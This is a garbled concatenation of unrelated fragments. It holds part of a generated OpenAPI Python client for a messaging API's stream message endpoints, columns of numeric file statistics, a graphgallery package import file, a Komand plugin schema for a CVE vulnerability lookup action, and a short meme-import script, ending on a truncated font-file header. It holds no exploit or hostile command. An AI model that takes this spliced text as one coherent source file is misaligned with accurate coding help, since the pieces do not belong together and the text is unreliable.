            urllib3.HTTPResponse without reading/decoding. Default True.
        _request_timeout (float/tuple): total timeout, or a
            (connection, read) pair. Default None.
        _check_input_type (bool): type-check data sent to the server.
            Default True.
        _check_return_type (bool): type-check data received from the
            server. Default True.
        _host_index (int/None): index of the server to use. Default is
            read from the configuration.

    Returns:
        V4MessageList, or the request thread when async_req=True.
    """
    # Fill in the standard request-control options, preserving any value
    # the caller supplied explicitly.
    for _option, _default in (
        ('async_req', False),
        ('_return_http_data_only', True),
        ('_preload_content', True),
        ('_request_timeout', None),
        ('_check_input_type', True),
        ('_check_return_type', True),
        ('_host_index', None),
    ):
        kwargs[_option] = kwargs.get(_option, _default)
    # Required positional parameters travel in kwargs as well.
    kwargs['sid'] = sid
    kwargs['since'] = since
    kwargs['session_token'] = session_token
    kwargs['key_manager_token'] = key_manager_token
    return self.call_with_http_info(**kwargs)
# Declarative descriptor for GET /v4/stream/{sid}/message. Wires parameter
# metadata to the private __v4_stream_sid_message_get callable defined
# earlier in __init__.
self.v4_stream_sid_message_get = _Endpoint(
    settings={
        'response_type': (V4MessageList,),
        'auth': [],
        'endpoint_path': '/v4/stream/{sid}/message',
        'operation_id': 'v4_stream_sid_message_get',
        'http_method': 'GET',
        'servers': None,
    },
    params_map={
        'all': [
            'sid',
            'since',
            'session_token',
            'key_manager_token',
            'skip',
            'limit',
        ],
        'required': [
            'sid',
            'since',
            'session_token',
            'key_manager_token',
        ],
        'nullable': [
        ],
        'enum': [
        ],
        'validation': [
        ]
    },
    root_map={
        'validations': {
        },
        'allowed_values': {
        },
        'openapi_types': {
            'sid':
                (str,),
            'since':
                (int,),
            'session_token':
                (str,),
            'key_manager_token':
                (str,),
            'skip':
                (int,),
            'limit':
                (int,),
        },
        'attribute_map': {
            'sid': 'sid',
            'since': 'since',
            'session_token': 'sessionToken',
            'key_manager_token': 'keyManagerToken',
            'skip': 'skip',
            'limit': 'limit',
        },
        # 'sid' is interpolated into the URL path; tokens go in headers;
        # paging parameters go in the query string.
        'location_map': {
            'sid': 'path',
            'since': 'query',
            'session_token': 'header',
            'key_manager_token': 'header',
            'skip': 'query',
            'limit': 'query',
        },
        'collection_format_map': {
        }
    },
    headers_map={
        'accept': [
            'application/json'
        ],
        # GET request: no request body, hence no content type.
        'content_type': [],
    },
    api_client=api_client,
    callable=__v4_stream_sid_message_get
)
def __v4_stream_sid_message_mid_update_post(
    self,
    sid,
    mid,
    session_token,
    **kwargs
):
    """Update an existing message.  # noqa: E501

    Updates an existing, non-deleted social message identified by stream
    ``sid`` and message ``mid``. Synchronous by default; pass
    ``async_req=True`` to get the request thread instead.

    >>> thread = agent_api.v4_stream_sid_message_mid_update_post(sid, mid, session_token, async_req=True)
    >>> result = thread.get()

    Args:
        sid (str): Stream ID
        mid (str): Parent message ID
        session_token (str): Authorization token used to make delegated calls.

    Keyword Args:
        key_manager_token (str): Key Manager authentication token. [optional]
        message (str): The message payload in MessageML. [optional]
        data (str): Optional message data in EntityJSON. [optional]
        version (str): Optional message version ("major.minor"). [optional]
        async_req (bool): execute request asynchronously. Default False.
        _return_http_data_only (bool): return response data without status
            code and headers. Default True.
        _preload_content (bool): if False, return the raw
            urllib3.HTTPResponse without reading/decoding. Default True.
        _request_timeout (float/tuple): total timeout, or a
            (connection, read) pair. Default None.
        _check_input_type (bool): type-check data sent to the server.
            Default True.
        _check_return_type (bool): type-check data received from the
            server. Default True.
        _host_index (int/None): index of the server to use. Default is
            read from the configuration.

    Returns:
        V4Message, or the request thread when async_req=True.
    """
    # Fill in the standard request-control options, preserving any value
    # the caller supplied explicitly.
    for _option, _default in (
        ('async_req', False),
        ('_return_http_data_only', True),
        ('_preload_content', True),
        ('_request_timeout', None),
        ('_check_input_type', True),
        ('_check_return_type', True),
        ('_host_index', None),
    ):
        kwargs[_option] = kwargs.get(_option, _default)
    # Required positional parameters travel in kwargs as well.
    kwargs['sid'] = sid
    kwargs['mid'] = mid
    kwargs['session_token'] = session_token
    return self.call_with_http_info(**kwargs)
# Declarative descriptor for POST /v4/stream/{sid}/message/{mid}/update
# (multipart form upload). Wires parameter metadata to the private
# __v4_stream_sid_message_mid_update_post callable defined earlier in
# __init__.
self.v4_stream_sid_message_mid_update_post = _Endpoint(
    settings={
        'response_type': (V4Message,),
        'auth': [],
        'endpoint_path': '/v4/stream/{sid}/message/{mid}/update',
        'operation_id': 'v4_stream_sid_message_mid_update_post',
        'http_method': 'POST',
        'servers': None,
    },
    params_map={
        'all': [
            'sid',
            'mid',
            'session_token',
            'key_manager_token',
            'message',
            'data',
            'version',
        ],
        'required': [
            'sid',
            'mid',
            'session_token',
        ],
        'nullable': [
        ],
        'enum': [
        ],
        'validation': [
        ]
    },
    root_map={
        'validations': {
        },
        'allowed_values': {
        },
        'openapi_types': {
            'sid':
                (str,),
            'mid':
                (str,),
            'session_token':
                (str,),
            'key_manager_token':
                (str,),
            'message':
                (str,),
            'data':
                (str,),
            'version':
                (str,),
        },
        'attribute_map': {
            'sid': 'sid',
            'mid': 'mid',
            'session_token': 'sessionToken',
            'key_manager_token': 'keyManagerToken',
            'message': 'message',
            'data': 'data',
            'version': 'version',
        },
        # 'sid'/'mid' are interpolated into the URL path; tokens go in
        # headers; message content goes in form fields.
        'location_map': {
            'sid': 'path',
            'mid': 'path',
            'session_token': 'header',
            'key_manager_token': 'header',
            'message': 'form',
            'data': 'form',
            'version': 'form',
        },
        'collection_format_map': {
        }
    },
    headers_map={
        'accept': [
            'application/json'
        ],
        'content_type': [
            'multipart/form-data'
        ]
    },
    api_client=api_client,
    callable=__v4_stream_sid_message_mid_update_post
)
| 42.365533
| 1,241
| 0.484413
| 4,993
| 54,821
| 5.107751
| 0.094532
| 0.037643
| 0.038231
| 0.025095
| 0.822452
| 0.809238
| 0.78677
| 0.76889
| 0.759048
| 0.730581
| 0
| 0.005988
| 0.433392
| 54,821
| 1,293
| 1,242
| 42.398299
| 0.815047
| 0.381113
| 0
| 0.729759
| 0
| 0
| 0.222222
| 0.026255
| 0
| 0
| 0
| 0
| 0
| 1
| 0.009847
| false
| 0
| 0.019694
| 0
| 0.039387
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
db52f9ac51efe466327bc4f01d5813812eb53145
| 309
|
py
|
Python
|
graphgallery/transforms/tensor_transform/__init__.py
|
Sharpiless/GraphGallery
|
5e8895cc2ca2fc06a31bfc58bc3b7a52e1ceddd0
|
[
"MIT"
] | 1
|
2020-11-22T10:14:58.000Z
|
2020-11-22T10:14:58.000Z
|
graphgallery/transforms/tensor_transform/__init__.py
|
Sharpiless/GraphGallery
|
5e8895cc2ca2fc06a31bfc58bc3b7a52e1ceddd0
|
[
"MIT"
] | null | null | null |
graphgallery/transforms/tensor_transform/__init__.py
|
Sharpiless/GraphGallery
|
5e8895cc2ca2fc06a31bfc58bc3b7a52e1ceddd0
|
[
"MIT"
] | 1
|
2020-11-22T10:14:59.000Z
|
2020-11-22T10:14:59.000Z
|
from graphgallery import backend
from graphgallery.transforms.tensor_transform.tensor2tensor import tensor2tensor
from graphgallery.transforms.tensor_transform.astensor import *
from graphgallery.transforms.tensor_transform import tf_tensor
from graphgallery.transforms.tensor_transform import th_tensor
| 51.5
| 81
| 0.883495
| 35
| 309
| 7.628571
| 0.314286
| 0.299625
| 0.389513
| 0.479401
| 0.659176
| 0.35206
| 0
| 0
| 0
| 0
| 0
| 0.007042
| 0.080906
| 309
| 5
| 82
| 61.8
| 0.933099
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 0
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
db6028d5283d25f1592f1125a46c95d06ce4c3bf
| 31,853
|
py
|
Python
|
plugins/rapid7_insightvm/komand_rapid7_insightvm/actions/get_vulnerabilities_by_cve/schema.py
|
lukaszlaszuk/insightconnect-plugins
|
8c6ce323bfbb12c55f8b5a9c08975d25eb9f8892
|
[
"MIT"
] | 46
|
2019-06-05T20:47:58.000Z
|
2022-03-29T10:18:01.000Z
|
plugins/rapid7_insightvm/komand_rapid7_insightvm/actions/get_vulnerabilities_by_cve/schema.py
|
lukaszlaszuk/insightconnect-plugins
|
8c6ce323bfbb12c55f8b5a9c08975d25eb9f8892
|
[
"MIT"
] | 386
|
2019-06-07T20:20:39.000Z
|
2022-03-30T17:35:01.000Z
|
plugins/rapid7_insightvm/komand_rapid7_insightvm/actions/get_vulnerabilities_by_cve/schema.py
|
lukaszlaszuk/insightconnect-plugins
|
8c6ce323bfbb12c55f8b5a9c08975d25eb9f8892
|
[
"MIT"
] | 43
|
2019-07-09T14:13:58.000Z
|
2022-03-28T12:04:46.000Z
|
# GENERATED BY KOMAND SDK - DO NOT EDIT
import komand
import json
# Generated action metadata for the Komand/InsightConnect plugin runtime.
class Component:
    # Human-readable description shown for this action.
    DESCRIPTION = "Get vulnerability details associated with a CVE"
class Input:
    # Key under which the CVE identifier appears in the action's input dict.
    CVE_ID = "cve_id"
class Output:
    # Key under which the result list appears in the action's output dict.
    VULNERABILITIES = "vulnerabilities"
class GetVulnerabilitiesByCveInput(komand.Input):
    """Input schema for the get_vulnerabilities_by_cve action.

    Declares a single required string parameter, ``cve_id``, and hands the
    parsed JSON schema to the komand.Input base class for validation.
    """

    schema = json.loads("""
   {
  "type": "object",
  "title": "Variables",
  "properties": {
    "cve_id": {
      "type": "string",
      "title": "CVE ID",
      "description": "Common Vulnerabilities and Exposures ID, e.g. CVE-2018-12345",
      "order": 1
    }
  },
  "required": [
    "cve_id"
  ]
}
    """)

    def __init__(self):
        # The generated `super(self.__class__, self).__init__(...)` recurses
        # forever if this class is ever subclassed, because self.__class__
        # then names the subclass. Zero-argument super() is the safe
        # equivalent on Python 3.
        super().__init__(self.schema)
class GetVulnerabilitiesByCveOutput(komand.Output):
schema = json.loads("""
{
"type": "object",
"title": "Variables",
"properties": {
"vulnerabilities": {
"type": "array",
"title": "Vulnerabilities",
"description": "Vulnerability details",
"items": {
"$ref": "#/definitions/vulnerability"
},
"order": 1
}
},
"required": [
"vulnerabilities"
],
"definitions": {
"cvss": {
"type": "object",
"title": "cvss",
"properties": {
"links": {
"type": "array",
"title": "Links",
"description": "List of hypermedia links to corresponding resources",
"items": {
"$ref": "#/definitions/link"
},
"order": 1
},
"v2": {
"$ref": "#/definitions/cvss_v2",
"title": "V2",
"description": "CVSSv2 details",
"order": 2
},
"v3": {
"$ref": "#/definitions/cvss_v3",
"title": "V3",
"description": "CVSSv3 details",
"order": 3
}
},
"definitions": {
"cvss_v2": {
"type": "object",
"title": "cvss_v2",
"properties": {
"accessComplexity": {
"type": "string",
"title": "Access Complexity",
"description": "CVSSv2 access complexity metric",
"order": 1
},
"accessVector": {
"type": "string",
"title": "Access Vector",
"description": "CVSSv2 access vector metric",
"order": 2
},
"authentication": {
"type": "string",
"title": "Authentication",
"description": "CVSSv2 authentication metric",
"order": 3
},
"availabilityImpact": {
"type": "string",
"title": "Availability Impact",
"description": "CVSSv2 availability impact metric",
"order": 4
},
"confidentialityImpact": {
"type": "string",
"title": "Confidentiality Impact",
"description": "CVSSv2 confidentiality impact metric",
"order": 5
},
"exploitScore": {
"type": "number",
"title": "Exploit Score",
"description": "CVSSv2 combined exploit metric score (Access Complexity/Access Vector/Authentication)",
"order": 6
},
"impactScore": {
"type": "number",
"title": "Impact Score",
"description": "CVSSv2 combined impact metric score (Confidentiality/Integrity/Availability)",
"order": 7
},
"integrityImpact": {
"type": "string",
"title": "Integrity Impact",
"description": "CVSSv2 integrity impact metric",
"order": 8
},
"score": {
"type": "number",
"title": "Score",
"description": "CVSSv2 score",
"order": 9
},
"vector": {
"type": "string",
"title": "Vector",
"description": "CVSSv2 combined vector string",
"order": 10
}
}
},
"cvss_v3": {
"type": "object",
"title": "cvss_v3",
"properties": {
"attackComplexity": {
"type": "string",
"title": "Attack Complexity",
"description": "CVSSv3 attack complexity metric",
"order": 1
},
"attackVector": {
"type": "string",
"title": "Attack Vector",
"description": "CVSSv3 attack vector metric",
"order": 2
},
"availabilityImpact": {
"type": "string",
"title": "Availability Impact",
"description": "CVSSv3 availability impact metric",
"order": 3
},
"confidentialityImpact": {
"type": "string",
"title": "Confidentiality Impact",
"description": "CVSSv3 confidentiality impact metric",
"order": 4
},
"exploitScore": {
"type": "number",
"title": "Exploit Score",
"description": "CVSSv3 combined exploit metric score (Attack Complexity/Attack Vector/Privilege Required/Scope/User Interaction)",
"order": 5
},
"impactScore": {
"type": "number",
"title": "Impact Score",
"description": "CVSSv3 combined impact metric score (Confidentiality/Integrity/Availability)",
"order": 6
},
"integrityImpact": {
"type": "string",
"title": "Integrity Impact",
"description": "CVSSv3 integrity impact metric",
"order": 7
},
"privilegeRequired": {
"type": "string",
"title": "Privilege Required",
"description": "CVSSv3 privilege required metric",
"order": 8
},
"scope": {
"type": "string",
"title": "Scope",
"description": "CVSSv3 scope metric",
"order": 9
},
"score": {
"type": "number",
"title": "Score",
"description": "CVSSv3 score",
"order": 10
},
"userInteraction": {
"type": "string",
"title": "User Interaction",
"description": "CVSSv3 user interaction metric",
"order": 11
},
"vector": {
"type": "string",
"title": "Vector",
"description": "CVSSv3 combined vector string",
"order": 12
}
}
},
"link": {
"type": "object",
"title": "link",
"properties": {
"href": {
"type": "string",
"title": "URL",
"description": "A hypertext reference, which is either a URI (see RFC 3986) or URI template (see RFC 6570)",
"order": 1
},
"rel": {
"type": "string",
"title": "Rel",
"description": "Link relation type following RFC 5988",
"order": 2
}
}
}
}
},
"cvss_v2": {
"type": "object",
"title": "cvss_v2",
"properties": {
"accessComplexity": {
"type": "string",
"title": "Access Complexity",
"description": "CVSSv2 access complexity metric",
"order": 1
},
"accessVector": {
"type": "string",
"title": "Access Vector",
"description": "CVSSv2 access vector metric",
"order": 2
},
"authentication": {
"type": "string",
"title": "Authentication",
"description": "CVSSv2 authentication metric",
"order": 3
},
"availabilityImpact": {
"type": "string",
"title": "Availability Impact",
"description": "CVSSv2 availability impact metric",
"order": 4
},
"confidentialityImpact": {
"type": "string",
"title": "Confidentiality Impact",
"description": "CVSSv2 confidentiality impact metric",
"order": 5
},
"exploitScore": {
"type": "number",
"title": "Exploit Score",
"description": "CVSSv2 combined exploit metric score (Access Complexity/Access Vector/Authentication)",
"order": 6
},
"impactScore": {
"type": "number",
"title": "Impact Score",
"description": "CVSSv2 combined impact metric score (Confidentiality/Integrity/Availability)",
"order": 7
},
"integrityImpact": {
"type": "string",
"title": "Integrity Impact",
"description": "CVSSv2 integrity impact metric",
"order": 8
},
"score": {
"type": "number",
"title": "Score",
"description": "CVSSv2 score",
"order": 9
},
"vector": {
"type": "string",
"title": "Vector",
"description": "CVSSv2 combined vector string",
"order": 10
}
}
},
"cvss_v3": {
"type": "object",
"title": "cvss_v3",
"properties": {
"attackComplexity": {
"type": "string",
"title": "Attack Complexity",
"description": "CVSSv3 attack complexity metric",
"order": 1
},
"attackVector": {
"type": "string",
"title": "Attack Vector",
"description": "CVSSv3 attack vector metric",
"order": 2
},
"availabilityImpact": {
"type": "string",
"title": "Availability Impact",
"description": "CVSSv3 availability impact metric",
"order": 3
},
"confidentialityImpact": {
"type": "string",
"title": "Confidentiality Impact",
"description": "CVSSv3 confidentiality impact metric",
"order": 4
},
"exploitScore": {
"type": "number",
"title": "Exploit Score",
"description": "CVSSv3 combined exploit metric score (Attack Complexity/Attack Vector/Privilege Required/Scope/User Interaction)",
"order": 5
},
"impactScore": {
"type": "number",
"title": "Impact Score",
"description": "CVSSv3 combined impact metric score (Confidentiality/Integrity/Availability)",
"order": 6
},
"integrityImpact": {
"type": "string",
"title": "Integrity Impact",
"description": "CVSSv3 integrity impact metric",
"order": 7
},
"privilegeRequired": {
"type": "string",
"title": "Privilege Required",
"description": "CVSSv3 privilege required metric",
"order": 8
},
"scope": {
"type": "string",
"title": "Scope",
"description": "CVSSv3 scope metric",
"order": 9
},
"score": {
"type": "number",
"title": "Score",
"description": "CVSSv3 score",
"order": 10
},
"userInteraction": {
"type": "string",
"title": "User Interaction",
"description": "CVSSv3 user interaction metric",
"order": 11
},
"vector": {
"type": "string",
"title": "Vector",
"description": "CVSSv3 combined vector string",
"order": 12
}
}
},
"link": {
"type": "object",
"title": "link",
"properties": {
"href": {
"type": "string",
"title": "URL",
"description": "A hypertext reference, which is either a URI (see RFC 3986) or URI template (see RFC 6570)",
"order": 1
},
"rel": {
"type": "string",
"title": "Rel",
"description": "Link relation type following RFC 5988",
"order": 2
}
}
},
"pci": {
"type": "object",
"title": "pci",
"properties": {
"adjustedCVSSScore": {
"type": "integer",
"title": "Adjusted CVSS score",
"description": "PCI adjusted CVSS score",
"order": 1
},
"adjustedSeverityScore": {
"type": "integer",
"title": "Adjusted severity score",
"description": "PCI adjusted severity score",
"order": 2
},
"fail": {
"type": "boolean",
"title": "Fail",
"description": "Whether this vulnerability results in a PCI assessment failure",
"order": 3
},
"specialNotes": {
"type": "string",
"title": "Special Notes",
"description": "PCI special notes",
"order": 4
},
"status": {
"type": "string",
"title": "Status",
"description": "PCI status",
"order": 5
}
}
},
"vulnerability": {
"type": "object",
"title": "vulnerability",
"properties": {
"added": {
"type": "string",
"title": "Added",
"displayType": "date",
"description": "Date that the vulnerability was added to InsightVM",
"format": "date-time",
"order": 1
},
"categories": {
"type": "array",
"title": "Categories",
"description": "List of vulnerabilities categories with which this vulnerability is affiliated",
"items": {
"type": "string"
},
"order": 16
},
"cves": {
"type": "array",
"title": "CVEs",
"description": "List of CVE identifiers associated with this vulnerability",
"items": {
"type": "string"
},
"order": 17
},
"cvss": {
"$ref": "#/definitions/cvss",
"title": "CVSS",
"description": "Vulnerability CVSS details",
"order": 15
},
"denialOfService": {
"type": "boolean",
"title": "Denial of Service",
"description": "Whether the vulnerability is a denial of service vulnerability",
"order": 7
},
"description": {
"$ref": "#/definitions/vulnerability_description",
"title": "Description",
"description": "Vulnerability description",
"order": 3
},
"exploits": {
"type": "integer",
"title": "Exploits",
"description": "Exploit count",
"order": 2
},
"id": {
"type": "string",
"title": "ID",
"description": "Vulnerability ID",
"order": 9
},
"links": {
"type": "array",
"title": "Links",
"description": "List of hypermedia links to corresponding resources",
"items": {
"$ref": "#/definitions/link"
},
"order": 4
},
"malwareKits": {
"type": "integer",
"title": "Malware Kits",
"description": "Malware kit count",
"order": 6
},
"modified": {
"type": "string",
"title": "Modified",
"displayType": "date",
"description": "Date the vulnerability was last modified in InsightVM",
"format": "date-time",
"order": 8
},
"pci": {
"$ref": "#/definitions/pci",
"title": "PCI",
"description": "Vulnerability PCI details",
"order": 11
},
"published": {
"type": "string",
"title": "Published",
"displayType": "date",
"description": "Date the vulnerability was published",
"format": "date-time",
"order": 12
},
"riskScore": {
"type": "number",
"title": "Risk Score",
"description": "Vulnerability risk score using the configured risk scoring strategy (RealRisk by default)",
"order": 14
},
"severity": {
"type": "string",
"title": "Severity",
"description": "Vulnerability severity string (Moderate/Severe/Critical)",
"order": 13
},
"severityScore": {
"type": "integer",
"title": "Severity Score",
"description": "Vulnerability severity score",
"order": 10
},
"title": {
"type": "string",
"title": "Title",
"description": "Vulnerability title",
"order": 5
}
},
"definitions": {
"cvss": {
"type": "object",
"title": "cvss",
"properties": {
"links": {
"type": "array",
"title": "Links",
"description": "List of hypermedia links to corresponding resources",
"items": {
"$ref": "#/definitions/link"
},
"order": 1
},
"v2": {
"$ref": "#/definitions/cvss_v2",
"title": "V2",
"description": "CVSSv2 details",
"order": 2
},
"v3": {
"$ref": "#/definitions/cvss_v3",
"title": "V3",
"description": "CVSSv3 details",
"order": 3
}
},
"definitions": {
"cvss_v2": {
"type": "object",
"title": "cvss_v2",
"properties": {
"accessComplexity": {
"type": "string",
"title": "Access Complexity",
"description": "CVSSv2 access complexity metric",
"order": 1
},
"accessVector": {
"type": "string",
"title": "Access Vector",
"description": "CVSSv2 access vector metric",
"order": 2
},
"authentication": {
"type": "string",
"title": "Authentication",
"description": "CVSSv2 authentication metric",
"order": 3
},
"availabilityImpact": {
"type": "string",
"title": "Availability Impact",
"description": "CVSSv2 availability impact metric",
"order": 4
},
"confidentialityImpact": {
"type": "string",
"title": "Confidentiality Impact",
"description": "CVSSv2 confidentiality impact metric",
"order": 5
},
"exploitScore": {
"type": "number",
"title": "Exploit Score",
"description": "CVSSv2 combined exploit metric score (Access Complexity/Access Vector/Authentication)",
"order": 6
},
"impactScore": {
"type": "number",
"title": "Impact Score",
"description": "CVSSv2 combined impact metric score (Confidentiality/Integrity/Availability)",
"order": 7
},
"integrityImpact": {
"type": "string",
"title": "Integrity Impact",
"description": "CVSSv2 integrity impact metric",
"order": 8
},
"score": {
"type": "number",
"title": "Score",
"description": "CVSSv2 score",
"order": 9
},
"vector": {
"type": "string",
"title": "Vector",
"description": "CVSSv2 combined vector string",
"order": 10
}
}
},
"cvss_v3": {
"type": "object",
"title": "cvss_v3",
"properties": {
"attackComplexity": {
"type": "string",
"title": "Attack Complexity",
"description": "CVSSv3 attack complexity metric",
"order": 1
},
"attackVector": {
"type": "string",
"title": "Attack Vector",
"description": "CVSSv3 attack vector metric",
"order": 2
},
"availabilityImpact": {
"type": "string",
"title": "Availability Impact",
"description": "CVSSv3 availability impact metric",
"order": 3
},
"confidentialityImpact": {
"type": "string",
"title": "Confidentiality Impact",
"description": "CVSSv3 confidentiality impact metric",
"order": 4
},
"exploitScore": {
"type": "number",
"title": "Exploit Score",
"description": "CVSSv3 combined exploit metric score (Attack Complexity/Attack Vector/Privilege Required/Scope/User Interaction)",
"order": 5
},
"impactScore": {
"type": "number",
"title": "Impact Score",
"description": "CVSSv3 combined impact metric score (Confidentiality/Integrity/Availability)",
"order": 6
},
"integrityImpact": {
"type": "string",
"title": "Integrity Impact",
"description": "CVSSv3 integrity impact metric",
"order": 7
},
"privilegeRequired": {
"type": "string",
"title": "Privilege Required",
"description": "CVSSv3 privilege required metric",
"order": 8
},
"scope": {
"type": "string",
"title": "Scope",
"description": "CVSSv3 scope metric",
"order": 9
},
"score": {
"type": "number",
"title": "Score",
"description": "CVSSv3 score",
"order": 10
},
"userInteraction": {
"type": "string",
"title": "User Interaction",
"description": "CVSSv3 user interaction metric",
"order": 11
},
"vector": {
"type": "string",
"title": "Vector",
"description": "CVSSv3 combined vector string",
"order": 12
}
}
},
"link": {
"type": "object",
"title": "link",
"properties": {
"href": {
"type": "string",
"title": "URL",
"description": "A hypertext reference, which is either a URI (see RFC 3986) or URI template (see RFC 6570)",
"order": 1
},
"rel": {
"type": "string",
"title": "Rel",
"description": "Link relation type following RFC 5988",
"order": 2
}
}
}
}
},
"cvss_v2": {
"type": "object",
"title": "cvss_v2",
"properties": {
"accessComplexity": {
"type": "string",
"title": "Access Complexity",
"description": "CVSSv2 access complexity metric",
"order": 1
},
"accessVector": {
"type": "string",
"title": "Access Vector",
"description": "CVSSv2 access vector metric",
"order": 2
},
"authentication": {
"type": "string",
"title": "Authentication",
"description": "CVSSv2 authentication metric",
"order": 3
},
"availabilityImpact": {
"type": "string",
"title": "Availability Impact",
"description": "CVSSv2 availability impact metric",
"order": 4
},
"confidentialityImpact": {
"type": "string",
"title": "Confidentiality Impact",
"description": "CVSSv2 confidentiality impact metric",
"order": 5
},
"exploitScore": {
"type": "number",
"title": "Exploit Score",
"description": "CVSSv2 combined exploit metric score (Access Complexity/Access Vector/Authentication)",
"order": 6
},
"impactScore": {
"type": "number",
"title": "Impact Score",
"description": "CVSSv2 combined impact metric score (Confidentiality/Integrity/Availability)",
"order": 7
},
"integrityImpact": {
"type": "string",
"title": "Integrity Impact",
"description": "CVSSv2 integrity impact metric",
"order": 8
},
"score": {
"type": "number",
"title": "Score",
"description": "CVSSv2 score",
"order": 9
},
"vector": {
"type": "string",
"title": "Vector",
"description": "CVSSv2 combined vector string",
"order": 10
}
}
},
"cvss_v3": {
"type": "object",
"title": "cvss_v3",
"properties": {
"attackComplexity": {
"type": "string",
"title": "Attack Complexity",
"description": "CVSSv3 attack complexity metric",
"order": 1
},
"attackVector": {
"type": "string",
"title": "Attack Vector",
"description": "CVSSv3 attack vector metric",
"order": 2
},
"availabilityImpact": {
"type": "string",
"title": "Availability Impact",
"description": "CVSSv3 availability impact metric",
"order": 3
},
"confidentialityImpact": {
"type": "string",
"title": "Confidentiality Impact",
"description": "CVSSv3 confidentiality impact metric",
"order": 4
},
"exploitScore": {
"type": "number",
"title": "Exploit Score",
"description": "CVSSv3 combined exploit metric score (Attack Complexity/Attack Vector/Privilege Required/Scope/User Interaction)",
"order": 5
},
"impactScore": {
"type": "number",
"title": "Impact Score",
"description": "CVSSv3 combined impact metric score (Confidentiality/Integrity/Availability)",
"order": 6
},
"integrityImpact": {
"type": "string",
"title": "Integrity Impact",
"description": "CVSSv3 integrity impact metric",
"order": 7
},
"privilegeRequired": {
"type": "string",
"title": "Privilege Required",
"description": "CVSSv3 privilege required metric",
"order": 8
},
"scope": {
"type": "string",
"title": "Scope",
"description": "CVSSv3 scope metric",
"order": 9
},
"score": {
"type": "number",
"title": "Score",
"description": "CVSSv3 score",
"order": 10
},
"userInteraction": {
"type": "string",
"title": "User Interaction",
"description": "CVSSv3 user interaction metric",
"order": 11
},
"vector": {
"type": "string",
"title": "Vector",
"description": "CVSSv3 combined vector string",
"order": 12
}
}
},
"link": {
"type": "object",
"title": "link",
"properties": {
"href": {
"type": "string",
"title": "URL",
"description": "A hypertext reference, which is either a URI (see RFC 3986) or URI template (see RFC 6570)",
"order": 1
},
"rel": {
"type": "string",
"title": "Rel",
"description": "Link relation type following RFC 5988",
"order": 2
}
}
},
"pci": {
"type": "object",
"title": "pci",
"properties": {
"adjustedCVSSScore": {
"type": "integer",
"title": "Adjusted CVSS score",
"description": "PCI adjusted CVSS score",
"order": 1
},
"adjustedSeverityScore": {
"type": "integer",
"title": "Adjusted severity score",
"description": "PCI adjusted severity score",
"order": 2
},
"fail": {
"type": "boolean",
"title": "Fail",
"description": "Whether this vulnerability results in a PCI assessment failure",
"order": 3
},
"specialNotes": {
"type": "string",
"title": "Special Notes",
"description": "PCI special notes",
"order": 4
},
"status": {
"type": "string",
"title": "Status",
"description": "PCI status",
"order": 5
}
}
},
"vulnerability_description": {
"type": "object",
"title": "vulnerability_description",
"properties": {
"html": {
"type": "string",
"title": "HTML",
"description": "Vulnerability description HTML",
"order": 1
},
"text": {
"type": "string",
"title": "Text",
"description": "Vulnerability description raw text",
"order": 2
}
}
}
}
},
"vulnerability_description": {
"type": "object",
"title": "vulnerability_description",
"properties": {
"html": {
"type": "string",
"title": "HTML",
"description": "Vulnerability description HTML",
"order": 1
},
"text": {
"type": "string",
"title": "Text",
"description": "Vulnerability description raw text",
"order": 2
}
}
}
}
}
""")
def __init__(self):
super(self.__class__, self).__init__(self.schema)
| 31.663022
| 148
| 0.425643
| 2,129
| 31,853
| 6.343354
| 0.086895
| 0.065902
| 0.096631
| 0.014069
| 0.859163
| 0.855017
| 0.855017
| 0.84776
| 0.840504
| 0.840504
| 0
| 0.018657
| 0.434622
| 31,853
| 1,005
| 149
| 31.694527
| 0.731245
| 0.001162
| 0
| 0.731855
| 1
| 0.008065
| 0.984818
| 0.036713
| 0
| 0
| 0
| 0
| 0
| 1
| 0.002016
| false
| 0
| 0.002016
| 0
| 0.014113
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 9
|
db7473d36bcf6295f4ab8356805e13abdd48c7c9
| 92
|
py
|
Python
|
scripts/import_templates.py
|
drewstinnett/maymays
|
324c157f2b3a4bcf4f3ee4e32976bb47605a9dca
|
[
"BSD-2-Clause"
] | null | null | null |
scripts/import_templates.py
|
drewstinnett/maymays
|
324c157f2b3a4bcf4f3ee4e32976bb47605a9dca
|
[
"BSD-2-Clause"
] | null | null | null |
scripts/import_templates.py
|
drewstinnett/maymays
|
324c157f2b3a4bcf4f3ee4e32976bb47605a9dca
|
[
"BSD-2-Clause"
] | null | null | null |
from memes.helpers import import_memes
def run():
print("Running")
import_memes()
| 13.142857
| 38
| 0.695652
| 12
| 92
| 5.166667
| 0.666667
| 0.354839
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.195652
| 92
| 6
| 39
| 15.333333
| 0.837838
| 0
| 0
| 0
| 0
| 0
| 0.076087
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.25
| true
| 0
| 0.5
| 0
| 0.75
| 0.25
| 1
| 0
| 0
| null | 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
db75c5bf1c7cef35e909b3d872735272aabd1c38
| 5,982
|
py
|
Python
|
fonts/m32_8x14.py
|
ccccmagicboy/st7735_mpy
|
